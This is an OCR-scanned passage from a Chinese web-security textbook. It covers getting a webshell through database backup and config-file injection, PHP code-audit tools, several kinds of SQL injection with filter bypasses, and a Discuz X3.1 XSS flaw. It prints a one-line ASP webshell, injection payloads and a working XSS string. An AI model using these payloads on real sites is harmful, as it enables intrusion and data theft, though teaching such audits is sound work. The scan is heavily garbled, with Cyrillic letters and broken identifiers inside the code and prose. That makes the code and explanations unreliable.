马 写 到 a 表 中 ; 接 看 执行 第 三 条 语句 ， 把 a 表 输 出 到 网 站 目录 下 的 d.php 里 ， 即 可 成 功 
getshell。 


2. 数据 库 备份 
数据 库 备份 也 是 常见 的 getshell 方 法 ， 不 过 mdb 数 据 库 备份 在 比较 新 式 的 后 台中 已 经 很 
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少见 了 ， 但 在 老式 后 台中 仍然 是 很 常见 的 。 一 般 情况 下 ， 需 要 满足 两 个 条 件 一 定 能 成 功 
getshell: 数据 库 路 人 径 可 挖 和 备份 文件 名 可 控 ， 如 图 3-41 所 示 。 


当前 数据 库 地 址 (相对 路 径 ) : data_jk/ joekoe_data. аср 
备份 数据 库 目录 (相对 串 径 ) : databackup 如 目录 不 存在 ， 程序 将 自动 创建 


备份 数据 库 名 称 (文件 全 名 ) : databak_2015-7-7. asp 如 该 文件 存在 将 会 被 要 盖 ， 如 没有 将 
自动 创建 


не: 

® 所 有 路 径 都 是 相对 于 程序 空间 根 目录 的 相对 路 径 

。 请 尽量 避免 使 用 .mdb 的 后 绿 名 命名 备份 数据 库 

e 您 可 以 用 这 个 功能 来 备份 您 的 网 站 数据 , 以 保证 您 的 数据 安全 ! 


图 3-41 对 备份 路 径 和 名 称 进行 修改 
这 里 只 需要 将 当前 数据 库 路 径 改 成 上 传 的 图 片 路 径 ， 再 将 备份 数据 库 名 修改 为 后 门 地 
址 即 可 。 


3. 写 入 配置 文件 


例如 xycms 的 后 台 配 置 文件 getshell， 在 配置 文件 中 任意 一 栏 中 插入 一 句 话 木 马 " %>< 
%ехесше (Request (chr(112))) %%><% ' " 即 可 getshell， 如 图 3-42 所 示 。 


自助 洗车 机 “%>C%execute (Request (chr (112)))%><%’ ” | 


upLoadFile/2013926589 
3-42 插入 一 句 话 木 马 
被 插入 代码 的 文件 inc/config.asp 的 源码 如 图 3-43 所 示 。 


ЖА Во: 1\wwwroot\ 子 四 2\Inc\config. asp 
<% 
Const итпате=“ p] ее 站 FR 
Const descriptio АД, родено 
Const keywords=" 3Xecute (Request (chr (112))) 828 “ 网 站 关键 字 
Const wzurl=“htt :om ”dx | 
Const wzlogo=“up 35891 gg 站 LDG0 图 片 路 径 
Const icp=" 苏 ICF јато 
Const тападепале 1 body 联系 人 
Const ета:1- "899 : 5.8 


Const telrum=”” 
Const рЬопепш-“ ZEH, 
Const faxnum=““ 
Const qqnum=“899 


Const address= | М ау 

Const ebook sh=" не: 0- 不 审核 ; 1- 审 核 。 

Const оп run="0" -开放 ee ала ETE 
пи off 4с- “Pod ЕН! 请 您 1510], ЕЛЕ...“ РАЗН 


83-43 配置 文件 源码 
4. 文件 包含 


在 黑 盒 渗透 中 ， 文 件 包 含 也 是 常见 的 getshel] 方 法 之 一 ， 接 下 来 在 审计 环节 将 详细 讲解 
其 原理 及 利用 方式 。 


一 MA \ 
шиесі / Же bŠ 
Ww Ил ван 


代码 审计 一 一 防 患 于 未 然 
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何 为 代码 审计 ? 通俗 地 讲 ， 通 过 阅读 一 份 源码 ， 对 其 进行 各 类 漏洞 挖掘 ， 这 样 的 过 程 
便 统 称 为 审计 。 在 审计 中 ， 你 不 但 需要 知道 各 类 漏洞 的 原理 ， 还 需要 民 好 的 审计 环境 。 在 
面 对 大 型 开源 程序 时 ， 信 息 量 往往 十 分 巨大 ， 所 以 工具 的 分 析 和 检索 是 必 不 可 少 的 。 本 章 
将 以 PHP 代 码 为 例 ， 来 讨论 代码 审计 的 相关 知识 。 

PHP 作 为 当今 热门 的 脚本 语言 ， 尤 其 适合 Web 开 发 。 因 为 其 拥有 跨 平台 、 易 上 手 、 功 
能 强大 等 特点 ， 现 被 广泛 使 用 。 然 而 ， 随 看 越 来 越 多 地 被 网 站 使 用 ，PHP 引 发 的 安全 问题 
也 变 得 热门 起 来 。 


41 常用 的 审计 工具 


好 工具 才能 市 来 高 效率 ， 首 先 来 了 解 一 下 常用 的 审计 工具 。 


1. Notepad 
虽然 Notepad Са Ж) 拥有 简洁 的 界面 ， 但 因为 其 效率 低下 ， 使 用 的 人 并 不 多 。 
2. сеау РНР 


Seay PHP 代 码 审计 工具 支持 单个 关键 词 扫 描 、 批 量 消 数 扫描 、 批 量 正 则 匹配 。 相 对 纯 
文本 而 言 ， 提 高 了 不 少 效 率 ， 如 图 4-1 所 示 。 


文件 系统 тава на ығын шиш ”软件 帮助 
FOSE 


| ва || вена || вш | mga; Q w 


ш 六 件 路 径 


清空 浏览 提示 : 浏览 载 和 源码 即 可 扫 痢 ， 尝 言 扫 指 可 在 扫描 桓 置 自 定义 国 数 和 正则 去 达 式 ， 黑 认 高 速 ， 区 分 大 小 写 ( 只 对 单 ; 


图 4-1 Seay PHP 界 面 
3. CodeXploiter 


这 是 一 球 国 外 的 代码 审计 工具 ， 其 特点 在 于 能 够 初步 判定 存在 问题 的 代码 位 置 和 存在 
的 问题 ， 再 结合 手工 但 看 即 可 判定 问题 是 否 存在 ， 十 分 便捷 。 


第 4 章 “ 代 码 审计 一 防 患 于 未 然 Ж 7 Жа 


4. 抓 包 改 包 工具 


这 些 工 具 对 有 渗透 经 验 的 读者 来 说 应 该 不 会 陌生 ，Burp Suite 和 Fiddler 比 较 知 名 ， 如 
图 4-2 和 图 4-3 所 示 。 


х 


File Edit Rules Tools Мем Нар GeoEdge 
gË Winconfig С) ++ Replay X - » Go | $ Stream ЕЕ бесоде | Keep: All sessions ~ © Any Process 


图 4-3 Fiddler 
5. 字符 转换 工具 


字符 转换 工具 很 多 ， 笔 者 在 这 里 推荐 小 莫 多 功能 转换 工具 ， 文 持 将 普通 编码 转换 为 
URL/SQL Еп/Нех/Авс/МО5 32/М05 16/Base64 等 格式 的 编码 ， 非 常 实 用 ， 如 图 4-4 所 示 。 


6. 常用 的 火狐 插件 


对 于 火狐 浏览 器 ， 部 分 读者 可 能 还 不 清楚 它 的 价值 。 在 渗透 中 ， 火 狐 浏 览 咒 以 及 它 的 
拓展 插件 是 必 不 可 少 的 工具 ， 它 在 PHP 审 计 中 也 是 个 很 得 力 的 助手 。 在 这 里 对 于 火狐 浏览 
器 的 安装 就 不 阐述 了 ， 下 面 来 给 大 家 介绍 几 球 常用 的 插件 。 

火狐 插件 的 安装 很 简单 ， 单 击 菜单 中 的 “管理 您 的 附加 组 件 ” 按 钮 ， 然 后 在 搜索 框 里 
搜索 要 安装 的 插件 名 称 即 可 ， 如 图 4-5 所 示 。 
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| 管理 您 的 附加 组 件 (Ctrl+Shift+A) 


火狐 修复 工具 


в 
- 
P о № 
a 


о о 


84-4 ‚ЕТ 84-5 安装 和 管理 火狐 插件 
(1) Firebug。Firebug 在 浏览 网 页 的 同时 又 可 作为 功能 丰富 的 开发 工具 ， 使 用 者 可 以 
对 任何 网 页 的 CSS、HTML 和 JavaScript 进行 实时 编辑 、 调 试 和 监控 ， 如 图 4-6 所 示 。 


x 


以 | Е | script < window#ap..r_window 


В <vindow з4-"аррсепкет в: пдоч" xmlna="http://www- mozilla.org соптапйЯзет, 

/теутазгег/дасекеерег/бһеге 13 .оп1у.кш1" xmlns:html="http: command, 

/fwwa -н3 org/1999/xhtml" ъїт1е="ЖХ ЕЕ broadcasterset, 
broadcaster, 
observes, 
keyset, key, 
гоо1Басра1егге, 
toolbarset, 
template, rule, 
conditions, 


ШІ" hasBrowserHandlers="true">» 
thtml:link ге1="їсоп" href="chrome://ntab/skin/logo 
/firefox.ico" style="display-ncne"/> 
В <browser id="content" type="cortent" src="http-://i #1ге 
охсһіпа. сп 
/?Эсасһарсав-20141231" #1еж-"1" clickthrough="never"> 


<script type="text/javascript"> action, 
</window> bindings, 
binding, 


content, member, 
triple, 
treechildren, 
treeicem, 


图 4-6 ”Firebug 调 试 工具 
(2) Live НТТР headers。 该 工具 用 来 对 数据 包 进 行 捕 获 ， 如 图 4-7 所 示 。 


HTTP Headers 
http://cclv.-firefoxchina.cn/cclv/v2/patterns.son 


GET /cclv/v2/patterns.json HTTP/1.1 

Host: cdv.firefoxchina.cn 

User-Agent: Mozilla/5.0 (Windows МТ 6.3; WOW64; rv:38.0) Сесіко/20100101 Firefox/38.0 

Accept: text/html,application/xhtml+xmlapplication/<ml;q=0.9*/*;q=0.8 

Accept-Language: zh-CN, zh;q=0.8,en-US;q=0.5,en;q=0.3 

Accept-Encoding: gzip, deflate 

Cookie: Нт Імі 994738Ь5#302сЬ062-#191074542-4=1436185500,1437071513,1437071550,1437581122 


Connection: keep-alive 


HTTP/1.1 200 OK 
Expires: Wed, 22 Jul 2015 16:12:45 GMT 
Date: Wed, 22 lul 2015 15:42:45 GMT 


á и 


Save All.. Replay... Capture 


图 4-7 Live HTTP headers 
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(3) Hackbar。Hackbar 包 含 了 一 些 弟 用 的 工具 ， 如 SQL、XSS、POST 请 求 、 加 密 
等 ， 如 图 4-8 所 示 。 


< A https://www.baidu.com Оте 


ІМТ Y| = Ф SQL- XSS- Encryption- Encoding- Other- 
ші Load URL 
% Split URL 
›) Execute 


Г] Enable Post data [Г] Enable Referrer 
图 4-8 Hackbar 
善 用 这 些 插件 ， 可 以 极 大 地 提高 效率 ， 刚 开始 使 用 时 ， 各 位 读者 可 以 多 花 一 些 时 间 来 
ЖЕЛІ, ем, ЛАС. 


42 SQL 注入 


如 今 ， 随 着 PHP 被 广泛 使 用 ，PHP 的 安全 问题 越 来 越 被 关注 。 而 最 常见 的 搭配 就 是 
PHP+MySQL， 接 下 来 我 们 探讨 一 下 PHP 审 计 中 MySQL 注 入 的 挖掘 。 


4.2.1 注入 的 原理 


顾名思义 ，SQL 注 入 就 是 通过 把 SQL 命 令 插入 到 Web 表 单 提交 、 输 入 域名 或 页 面 请 求 
的 得 询 字 符 串 ， 最 终 达 到 欺骗 服务 器 执行 恶意 的 SQL 命令 的 目的 。SQL 注 入 是 当今 网 络 上 
最 普 蜗 的 一 种 攻击 方法 。 
为 了 更 好 地 了 解 其 原理 ， 下 面 来 看 一 段 问 题 代 码 。 
<?php 
include ( 'contig.-php') ; 
1Е ($ сЕТ|"14"1) i 


бай Свара //бЕТ È 
$sql="select * from test user where ій-біа"; // в) 
$result=mysql query ($sql); // 代 入 查询 


echo mysql егтог(); 
} 


2> 


从 代码 中 可 以 看 到 ， 先 将 参数 id 的 值 以 GET 方 式 传递 给 变量 id， 然 后 直接 将 变量 id 代 
入 了 SQL 语句 进行 查询 。 而 当 提 交 如 单 引 号 这 样 的 特殊 字符 时 ， 便 会 出 现 语 法 错误 ， 从 而 
产生 报错 。 
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select * from test user where id=$id>select * from test user where id=' 
因此 ， 一 个 最 简单 也 最 典型 的 SQL 注 入 漏洞 出 现 了 。 提 交 单 引号 后 的 结果 如 图 4-9 所 示 。 


http://localh..t.php?id=1%27 х \ + 


\ 4 а localhost/test.php?id=1' О v е | а Google <Ctrl+K: | ў | а » | = 
Ы 


[INT т] эх SQ- XSS- Encryption: Encoding- Other- 
а Load URL 
Ü Split URL 
JJ Execute 
Enable Post data Enable Referrer 


You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use пеаг"" at line 1 


4-9 提交 单 引 号 


422 常见 的 注入 


在 审计 中 ， 最 常 出 现 的 注入 便 是 GET 注 入 、POST 注 入 和 Cookie 注 入 。 而 POST 注 入 
也 是 最 容易 被 忽略 的 ， 有 时 可 能 因为 传递 的 参数 较 多 ， 常 常 忽略 某 个 参数 的 过 滤 ， 从 而 
导致 了 注入 。 在 实际 开发 中 ， 往 往 有 的 开发 人 员 使 用 了 REQUEST 传 参 ， 却 只 对 GET 进 行 了 
过 滤 ， 因 此 可 以 换 一 种 方式 提交 数据 进行 注入 在 黑 盒 中 更 加 普遍 ) 。 下 面 来 看 两 段 问题 
代码 。 


Global .php: 
<?php 
foreach ($ СЕТ as $get key=>$get таг) { // 遍 历 所 有 GET 过 来 的 值 


if (15 numeric($get уаг)) { 
зае! [strtolower ($get кеу) ]=get 115 ($деі мас); //ЗПЕ РАЗ дес int 
| else | 


ае erroe у: 
function get int ($number) { 
return intval ($number); // 强 制 整 型 


2> 


<?php 
include ('config.php'); 


жак кыши—Батжи L ТИ 


include ('global.php'); // 加 载 过 滤 文件 
$14=$ ВЕОЧЕЗТ ['1а']; 

$sql="select * from test user where ій-біа"; // 拼 接 语句 
$result=mysql query ($sql); // 代 入 查询 
echo mysql еггог(); 


2> 


因为 REQUEST 默 认 情 况 下 包含 了 $ СЕТ, $ POSTAIS COOKIE 的 数组 ， 虽 然 对 GET 方 
式 进 行 了 过 滤 ， 但 仍 可 以 用 POST 或 者 Cookie 的 方式 来 提交 数据 ， 从 而 绕 过 了 过 滤 进 行 注入 。 

注意 : POST 传递 是 位 于 数据 包 中 的 。 因 此 ， 注 入 时 便 需 要 用 到 抓 包 改 包 工具 ， 这 里 
直接 用 火狐 插件 代替 ， 如 图 4-10 所 示 。 


7 http://localhost/test.php х 


+ Ф localhost/test.php Я ус 4 Google ск WW Ш > | Е 


мт = Ф 501» XSS- Encryption- Encoding- Other- 
ФӘ LoadURL  http:/focalhost/testphp — í í í í í í í í í í í í 
Ш Split URL 


[© Ехесиїе 


Епа е Post data Enable Вефеггег 


Post data id=1| 


You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near ™ at line 1 


图 4-10 POSTA 
很 多 开发 人 员 在 开发 中 对 数组 的 过 滤 不 严 ， 往 往 只 是 过 滤 了 value， 而 忽略 了 key， 下 
面 来 看 一 段 代 码 。 


<?php 

include (' сопіс.рһр'); 

бій-5 СЕТ['іа']; 

if (15 аггау (514) ) { 

Ғогеасһ (519 аз $Кеу=>$уа1ае){ //Ж В 

5уа1 пе-1п та! ($value); // 对 value 进 行 强制 整 型 
$5а1="5е1есЕ * from test user where id=$key апа изегпаше- 
$value"; 
$гези1&=му5а1 query ($sql); 


есһо туді еггог(); 


2> 
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可 以 看 到 上 述 代码 对 id 的 value 进 行 了 过 滤 ， 却 忽略 了 对 key 的 过 滤 ， 并 且 将 key 代 入 了 
得 询 ， 因 此 可 以 对 key 进 行 注入 ， 如 图 4-11 所 示 。 


hitpy/localh..hp?id[1%27]=1 ж 


+ @ localhost/bakphp?id{[1]=1 ga с | Q, Google «стек» | ж за $~ 


(ы, = © 501» XSS- Encryption- Encoding» Other- 
ча Load URL 
4 Split URL 
2) Execute 
Enable Post data |” Enable Referrer 


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the 
right syntax to use near " and username=1' at line 1 


4-11 ”数组 key 的 注入 
注意 : 这 里 的 注入 格式 为 xx.test. php?id[ 注 入 语句 ]=1。 


423 http 头 注入 


何 为 http 头 ? http 客 户 程序 癌 服务 器 发 送 请 求 的 时 候 必须 指明 请 求 类 型 ， 从 而 产生 了 
http 头 。 和 常见 的 http 头 如 下 所 述 。 
Host: 初始 URL 中 的 主机 和 端口 。 
Referer: 包含 一 个 URL， 用 户 从 该 URL 代 表 的 页 面 出 发 访问 当前 请 求 的 页 面 
User-Agent: 浏览 器 类 型 。 
Accept: 浏览 器 可 接收 的 MIME 类 型 。 
Accept-Language: 浏览 器 所 希望 的 语言 种 类 。 
Connection: 表示 是 否 需 要 持久 连接 。 
Content-Length: 表示 请 求 消息 ла 长 度 。 
Cookie: 这 是 最 重要 的 请 求 头 信息 
而 在 审计 中 ， ани. 
> User-agent， 浏 览 器 类 型 (F). 
> Referer， 来 源 〈 少 ) 。 
> X-Forwarded-For， 获 取 IP (多 ) 。 
> client ір, ЖАР (8). 
这 里 给 出 一 段 X-Forwarded-For 注 入 的 问题 代码 。 
Get .php: 


v у V V V у у V 


<?php 
$info ip=$ SERVER['HTTP X FORWARDED FOR']; // 获 取 X FORWARDED FOR 
Sinfo referer = 5 SERVER['HTTP REFERER']; 
Sinfo user agent= $ SERVER['HTTP USER АСЕМТ']; 


Е». 
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Test .php : 

<?php 
include ('config.php') ; 
include ('get.php'); 
$sql="INSERT INTO test info (ір) VALUES ($info ip) "; // 拼 接 语句 
$result=mysql query ($sql); // 代 入 查询 
есһо mysql еггог(); 


2> 


burp intruder repeater window about 


target | proxy | spider | scanner | intruder | repeater | sequencer | decoder | comparer | options | alerts 


host localhost 


raw | headers | пех | 


СЕТ //test.php НТТР/1.1 

Host: localhost 

User-Agent: Mozilla/5.0 (Windows NT 6.1; ку:38.0) Сеско/20100101 Firefox/38.0 
Accept: text/html, application/xhtml+xml, application/xml; 470.9,“/ +; ат0.8 
Accept-Language: zh-CN, 2; q=0.8, en-US; q=0.5, еп; 4-0.3 


Accept-Encoding: gzip, deflate 
X-Forwarded-For: '| 
Connection: keep-alive 


+11211 | 0 matches 


ан | headers | 


Connection: Keep-Alive 
Content-Type: text/html 


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server 
version for the riqht syntax to use near '')' at line 1 


Мы ы | 


length: 379 (1,031 millis) 


图 4-12 һар À 


424 二 次 注入 


随 着 安全 问题 日 趋 被 重视 ， 一 些 简单 的 SQL 注 入 在 大 中 型 开源 程序 中 已 基本 销声匿迹 
了 。 而 出 现 更 多 的 则 是 二 次 注入 ， 相 对 于 一 次 注入 漏洞 而 言 ， 二 次 注入 漏洞 更 难以 被 发 
现 ， 但 是 它 却 具 有 与 一 次 注入 攻击 漏洞 相同 的 攻击 威力 。 
下 面 来 看 茶 个 开源 商场 系统 的 漏洞 实例 。 
<?рһр 
ТЕ (1ззе! ($ 5ЕЗЗТОМ['сакЕ'] ['1п'])) { // 重 复 执 行 订 单 


unset ($ SESSIONL[ 'сагё"']); 
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сеггог( ("submit order Ем1се")); 


$ ЗЕЗЗТОМ [ cart 11" 1п"| = trus; 


// 正 在 执行 订单 


$tradeid = $time.mt гапа (100,999); 


$data = аггау ( 
"tradeid" 
piel 
"uname" 
"addtime" 
"status" 
"totalfee" 
"itemfee" 
"postfee" 
"пап п 
"сопроп" 
"ехргеѕѕмауіа" 
"розтгуре" 
"receiver name" 
"receiver province" 
"receiver city" 
"receiver district" 
"receiver address" 
"receiver zip" 
"receiver link" 
"memo" 
"payment " 
"1зтах" 
"Сах сопрапу" 


); 


v V V V V V V V v V V V V v V V V V V V v V V 


$Егааела, 
$this->uid, 
5 SESSION['uname ' ] ， 


$time, 

"WAIT PAY", //ЖХЯ 

getPrice (Stotalfee,2, 'int'), 
getPrice ($itemfee,2, 'int'), 
getPrice ($postfee,2, 'int'), 
ошап. 2 Smanl ве 4 Е”, 
$сопроп ? $сопроп | "депо" | : 0, 
бмауіа, 

$posttype, 


Saddress['receiver'], 
Saddress['province'], 
Saddress['city'], 
Saddress['district'], 
Saddress['address'], 
Saddress['zipcode'], 
Saddress['link'], 
Smemo, 

зраушептсоде, 

$istax, 


Stax company 


ОВ: -qetDB() >insert("trade",šdata); //іпзегі KEA 


задддага = Spromodata = аггау(); 


56 
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public function insert ($tableName, $data = аггау()) | 
$sql = "INSERT INTO ".$this->getTableName ($StableName); 
$sql .="(".implode(",",array map (array ($615, "еѕзсарекеу"),аггау 
keys ($data))).") values ("; 
$sql .= $this->getInsertVal ($data); 
Бад ЕЕ. 
$this->query ($sql); 
ТЕ (15Е115->еггпо) | 
return $this->lastid();/ 
} 


return false; 


getInsert Vl FERE f Л.Л, ЖАННЫН НЕ, кам. М FERARI 
中 来 找 找 出 库 的 地 方 。 


if ($count) { 
$this->data["pagearr"] = getPageArr ($page, $pagesize, $count, '',true); 
$this->data['trades'] = DB::getDB()->select ("trade", 
"tradeid, receiver пате, totalfee,addtime,status,payment", $мһегеѕіг, 
"tradeid DESC", $this->data['pagearr'] ['limit'],"tradeid"); 
// 这 里 出 库 , 同样 嵌 套 了 几 个 函数 , 但 也 没有 进行 过 滤 同 样 省 略 
$tradeids = array keys ($this->data['trades']); 
Sorders = DB: : дет В () ->ѕе1есі ("order","itemid, itemimg, itemname, 
tradeid,orderid","tradeid in ".cimplode ($tradeids)); 
foreach (Sorders аз $огаег) | 
‘this >дйага | "гтайев”" 11зогает Г Етадета ili огдет "1 | огдег гогдетта [1 
= богаег; 
} 

} 

$this->output ("gettrade"); 


А 黑客 与 安全 技术 指南 


入 库 、 出 库 都 没有 进行 过 滤 ， 因 此 可 以 判定 存在 二 次 注入 。 上 再 回 到 insert 函 数 ， 可 以 
看 到 碍 询 语句 如 下 。 


INSERT INTO cart trade ('tradeid','uid','uname', 'addtime','status', 
"Соёа1 Ғее', "1Ееш ее", ' роѕі Еее", "пап", "coupon", "expresswayid",'post 
type','receiver паше", "гесетуег province','receiver city','receiver _ 
district','receiver аддгезз", "гесетуег zip','receiver 11пК','тето','рау 
ment','istax','tax company')values ('1418809144596',2,'test',1418809144, 
ATO PAY. 6 0015300 О із АЕС тт о и 


К Ва жэ,» С ЕД 


可 以 构造 receiver=', 1, 1, 1, чзег(), 1, 1, 1, 1,0, 2)#, 6 851531, НЕЕ 
面 多 余 的 语句 ， 提 交 过 程 如 图 4-13 所 示 。 


收 货 人 信息 


图 "11,1иег(),1,1,1,1,0,2)% 北京 北京 市 东城 区 111 


© 添加 新 地 址 
"АЛА : ' 1, 1, 1, изег),1,1,1,: 


北京 у - 北京 市 - 


100010 


* 电 话 /手机 , : 11111111111 


[保存 并 使 用 这 个 地 址 | 
4-13 ”提交 过 程 


提交 的 数据 包 如 图 4-14 所 示 。 


ee | response | 
raw | params | headers | ner 


[POST /index. php?mode l=buy&action=saveaddr HTTP/1.1 | 
Host: skyofdll.hlk.delldns.com 

| User-Agent: Мо2і11а/ 5.0 (Windows МТ 6.1; rv:38.0) Сеско/20100101 Ғіге#ох/38.0 

Accept: */* 

| Accept-Language: zh-CN, 2; 4-0.В,еп-П3; 4-0.5,еп; 4-0.3 

М Accept-Encoding: gzip, deflate 

| Сопсепс-Туре: application/x-www-form-urlencoded; charset=UTF-8 

) X-Requested-With: XMLHttpRequest 

| РеТегег: http://skyofdll.hlk.delldns.com/index.php?model=buy 

| Сопсепс-Пепаси: 159 

Cookie: сакс сагстісеп 47 3; | 

|сакс_зезз=403276419781Е7064аа718ВаОаа42 6611200655553; 

| р SID=SACC47A54DCOD13BEC6SCBDBƏBIFSAF5; сакс зепӣзтз=1; сакс зепаета11=1; 

Мсасс и1згогу-47 

Соппесс1оп: keep-alive 

1 Ркаста: no-cache 

Cache-Control: no-cache 


| үесеімек-!%2С1%2С1%2С1%2Счизег ()52С152С152С152С152С052С2) з2Заркоу1псе+ 1 10000&сісу=1 
1 101006вй13гг1с5#110101 вайддгезз- 111611пК-1111111111 1621 рсойее 1000 1 Овадд9гезз1а-8 


| С Е mes|| 
4-14 ”提交 的 数据 包 


— 58 ә 
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成 功 提 交 后 ， 切 到 个 人 中 心 ， 然 后 合 看 订单 ， 如 图 4-15 所 示 ， 可 以 看 到 出 库 的 地 方 已 
经 “ 髓 看 ”注入 出 的 数据 了 。 


1434373133743 
ЕСЕН: 1 


5куо 1 Фіоса!һов% 


图 4-15 成 功 二 次 注入 


425 过 滤 的 绕 过 


在 开发 中 ， 开 发 人 员 想 尽 办 法 杜绝 注入 的 情况 出 现 ， 而 通常 采用 的 办 法 便 是 过 滤 。 
常见 的 过 小 大 致 分 为 正则 和 关键 词 的 过 小， 相对 关键 词 的 过 滤 ， 正 则 过 小 的 方式 则 更 
为 高 效 。 但 是 并 没有 绝对 安全 的 方法 ， 任 何 防御 都 存在 被 绕 过 的 风险 ， 而 常见 的 绕 过 
如 下 。 

> 大 小 写 混合 。 

> 替换 关键 字 。 

> 使 用 编码 。 

> 使 用 注释 。 

> 等 价 函 数 与 命令 。 

> 使 用 特殊 符号 。 

> http 参 数控 制 。 

> 整合 绕 过 。 


接 下 来 将 展示 几 个 对 关键 词 进行 过 小 的 简单 bypass〈 绕 过 ) 方法 。 
1. 过 滤 代码 
preg па с ('/ (апа |ог | иптоп | мһеге | 1117) /Т',$1а) 


绕 过 方法 : 对 关键 词 and，or，union，where，limit 进 行 了 过 滤 ， 构 造 代码 类 似 于 11|| 
(select user from users group by user id having user 19=1 ) = 'admin' 即 可 绕 过 。 


2. 过 滤 代 码 


preg match('/select|orderl|insertlupdatelevalldocument|deletelinjection|j 


ection А АЗ А el ТапбФ;5вкт) 


绕 过 方法 : 仅 对 小 写 的 注入 关键 词 进 行 了 过 滤 ， 大 写 即 可 绕 过 。 
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43 XSS il 


XSS 攻 击 是 近 些 年 盛行 的 一 种 攻击 方式 ， 恶 意 攻击 者 往 Web 页 面 里 插入 恶意 html 代 
码 ， 当 用 户 浏 览 该 网 页 时 ， 骨 入 其 中 的 html 代 码 会 被 执行 ， 从 而 达到 恶意 攻击 用 户 的 特殊 
目的 。 而 PHP 中 对 XSS 的 审计 又 是 怎样 的 呢 ? 

这 是 一 个 Discuz 的 历史 漏洞 了 ，Discuz 第 一 时 间 在 X3.1 版 本 的 一 个 补丁 中 修复 了 这 一 
漏洞 ， 不 过 对 于 仍然 使 用 看 Discuz X3.1 旧 版 本 (其 实 绝 大 多 数 都 在 使 用 旧版 本 ， 因 为 补丁 
发 布 的 时 候 X3.1 已 经 发 布 很 信 了 ) 及 以 下 版 本 的 网 站 来 说 ， 这 个 漏洞 依然 有 效 。 下 面 我 们 
来 体验 一 下 这 个 漏洞 的 审计 过 程 。 

有 关 这 个 漏洞 的 代码 在 \upload\source\function\ 下 的 function discuzcode.php 中 。 


119 1#(5а11омррсоае) 1 

120 if (strpos ($msglower, 'еа2к://') != FALSE) (| 

21 Se5sage рр 
$message); 

кгз. 

12 175] 


很 显然 ， 这 段 代 码 用 于 检测 是 否 启 用 ed2k 协 议 并 在 第 121 行 对 ed2k 链 接 进 行 了 处 理 。 
为 了 让 读者 更 清晰 地 理解 这 些 PHP 代 码 ， 本 书 假设 读者 对 PHP 的 掌握 处 于 入 门 阶段 ， 对 涉 
及 的 一 些 API 做 一 个 简单 介绍 。121 行 中 的 preg replace 函 数 原型 如 下 。 


mixed preg replace ( mixed $pattern , mixed replacement , mixed 
$subject |, int $11116 = -1 |, int &$count ]] ) 

// preg_replace 执行 一 个 正则 表达 式 的 搜索 和 替换 : 搜索 subJject 中 匹配 pattern 的 部 分 ， 
Ягер1асетеп #474 1 


对 于 刚刚 接触 代码 审计 的 初学 者 来 说 ， 可 能 会 感觉 目 己 对 代码 的 掌握 程度 不 够 ， 没 关 
系 ， 每 种 语言 的 官方 手册 对 每 个 函数 都 有 详细 解释 以 供 开 发 者 学 习 。 对 于 有 一 定 经 验 的 审 
计 者 来 说 ， 开 源 项 目的 手册 或 说 明文 中 仍 有 很 多 重要 的 部 分 ， 而 且 同 一 厂商 过 去 的 漏洞 也 
可 能 为 审计 引导 一 个 方向 ， 不 要 考 于 站 在 巨人 的 肩膀 上 ! 

这 个 函数 调用 parseed2k() 函 数 对 $message 进 行 正 则 人 处理 ， 下 面 来 跟踪 处 理 函 数 
parseed2k()。 


320 function рагзеед2к ($url) | 


321 global Š G; 

ала list (, $type, $name, 5512е,) = ехр1оае('|', $url); 
// 用 来 读 取 连 接 中 的 类 型 , 名 称 与 大 小 

323 mipi =" = e РА yr азаи ry 
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324 $name = addslashes ($name); 

3253 if ($type == 'file') { 

326 $ed2kid = 'ed2k '.гапаот (3); 

321 return "<а 19-"".зед2К1д."" һгеғҒ="'.$иг1.'" Тагдеб-". 


Бтапк">" алш зреста1 срагз (чиг1й4есойе ($паше)) .' 
(".5ігесоппЕ(5512е).")</а><5сгіріе language="javascript"> 
$(\''.5еа2к1ла.'\') .innerHTML=htmlspecialchars (ппезсаре 
(decodeURIComponent (\''.$пашме.'\')))+\' ('.sizecount 


(5з17ге) .") \';</зсгірё>'; 


328 } else { 

323 Pecari ЕЕ ен ЕЕ Seear 
330 } 

331 } 


从 这 段 代 码 中 可 以 看 出 ，parseed2k() 并 没有 对 参数 $size 进 行 安全 处 理 ， 甚 至 没有 对 
$size 进 行 类 型 转换 〈 和 暂且 认 为 这 是 程序 员 的 疏忽 ) ， 因 此 函数 sizecount($size) 中 传 入 的 是 
字符 串 类 型 的 $size 变 量 。 

下 一 步 跟 进 sizecount(0) 函 数 ， 它 在 同 目 录 下 的 function core.php 中 : 


1601 Ғопсііоп sizecount (5517е) | 

1602 if ($size >= 1073741824) { 

1603 55і2е = гоппа ($5172е/1073741824 * 100)/100 . "СВ"; 
1604 | етзе 1 (551уе > 10489576) 1 

1605 size = гоцпа(5517е / 1048576 % 100) / 100 ." МВ": 
1606 +: е! зе зЕ алга >= 1024) | 

1607 ӛзіхе = гошай(5517хе / 1024 = 100) Е 100 „>Фкв": 
1608 | else | 

1609 $size = $size . "Вуғе5"; 

1610 } 

1611 return $size; 

1612 } 


这 段 代码 用 来 对 文件 大 小 进行 划分 ， 字 符 串 类 型 的 Ssize 的 值 在 与 Number 类 型 比较 
时 ， 会 被 强制 转换 成 Number 类 型 后 再 进行 比较 。 如 果 传 入 的 $size 并 不 是 纯 数字 字符 串 ， 
那么 $size 的 值 会 被 转换 成 NaN (Not а Number) ， 不 会 触发 前 三 个 if 语句， 直接 进入 else 语 
句 ， 而 else 中 的 函数 并 没有 对 $size 进 行 类 型 转换 ， 直 接 与 'Bytes' 进 行 了 配对 ， 配 对 后 的 字 
符 串 被 最 终 返回 给 function discuzcode.php 中 121 行 的 Smessage， 然 后 被 输出 。 

第 1609 行 代码 在 X3.1 补 丁 中 被 替换 为 : 
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1609 $517е = 1пЕ уа! (5віге) . " Вуіеѕ'; 


шбуа ОЕ ве А, же Г ЯА] 7$ ме] XSST .- 
下 面 来 实际 测试 一 下 : 
在 Discuz X3.1 或 以 下 版 本 的 论坛 中 发 帖 时 插入 这 样 一 句 : 


еа2к:// |#1е|хѕѕ|'+а1егі (123) +" |х55/ 
图 4-16 所 示 的 对 话 框 证 明了 漏洞 的 存在 。 


ios8.3 可 以 用 又 又 助 手 越 狱 么 ? 
Г) 发 表 于 3 天 前 » 

= 
如 题 ,ios8.3 可 以 用 又 叉 助 手 越狱 么 ; 


